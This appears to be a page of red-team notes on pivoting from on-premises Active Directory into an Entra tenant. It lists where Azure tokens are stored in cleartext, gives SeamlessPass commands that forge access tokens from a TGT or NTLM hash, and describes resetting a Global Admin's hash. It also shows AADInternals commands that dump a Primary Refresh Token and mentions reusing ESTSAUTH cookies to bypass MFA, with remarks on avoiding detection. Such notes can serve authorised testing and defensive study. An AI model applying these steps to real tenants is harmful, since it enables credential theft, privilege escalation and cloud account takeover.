Pivoting to Entra
Azure Tokens
Depending on the installed version of the Azure AD PowerShell module, Azure access tokens may be encrypted with DPAPI or stored simply in cleartext. Inspect the C:\Users\user1\.Azure folder for these files:
# Cleartext
accessToken.json
tokenCache.dat
AzureRmContext.json
azureProfile.json
# Encrypted with DPAPI
msal_token_cache.binSeamless SSO
If an Entra tenant is configured for seamless SSO, Kerberos tickets issued by on-prem KDC may essentially be used to request access tokens on behalf of any principals. As such, this is an extremely useful (and stealthy) attack vector when you have access to on-prem KDCs. SeamlessPass is a good tool for this attack.
seamlesspass -tenant corp.com -domain corp.local -dc dc.corp.local -tgt <base64_encoded_TGT>
seamlesspass -tenant corp.com -domain corp.local -dc dc.corp.local -username user -ntlm DEADBEEFDEADBEEFDEADBEEFDEADBEEFNon-Seamless SSO
Unfortunately, many times Entra tenants are not configured with seamless SSO. This leaves us with two options for cloud pivoting (technically three, if you dump the MSOL account password).
The first option involves manually changing a Global Admin's NTLM hash, waiting for the Entra tenant to sync with on-prem AD, and then authenticating with the new password. From there, we can create a new highly privileged user or service principal, but regardless it's going to be loud.
changepasswd.py from impacketThe second option is to locate a Global Admin's Entra-joined device and dump the stored PRT. This also isn't as stealthy as you think - PRTs are not often used and stick out like a sore thumb in auth logs. It's better than changing passwords, though.
ipmo "AADInternals-Endpoints"
# Get the PRToken
$prtToken = Get-AADIntUserPRTToken
# Get an access token for AAD Graph API and save to cache
Get-AADIntAccessTokenForAADGraph -PRTToken $prtTokenA final option involves bypassing MFA when a cleartext password is known. Look out for the ESTSAUTH cookie in DPAPI dumps to interact with persistent sessions!
Last updated